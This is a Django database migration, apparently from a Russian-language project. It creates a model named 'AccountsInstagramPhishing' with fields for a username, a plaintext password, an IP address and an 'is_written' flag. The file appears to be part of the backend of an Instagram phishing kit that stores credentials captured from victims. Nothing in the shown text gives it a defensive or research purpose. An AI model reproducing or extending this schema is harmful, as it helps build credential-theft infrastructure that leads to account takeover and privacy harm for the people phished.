# Generated by Django 5.0.4 on 2024-10-06 08:15

from django.db import migrations, models


class Migration(migrations.Migration):

    dependencies = [
        ('account', '0001_initial'),
    ]

    operations = [
        migrations.CreateModel(
            name='AccountsInstagramPhishing',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=250, verbose_name='Имя пользователя')),
                ('password', models.CharField(max_length=250, verbose_name='Пароль')),
                ('is_written', models.BooleanField(default=False)),
                ('ip_address', models.CharField(max_length=250, verbose_name='Ip')),
            ],
        ),
    ]
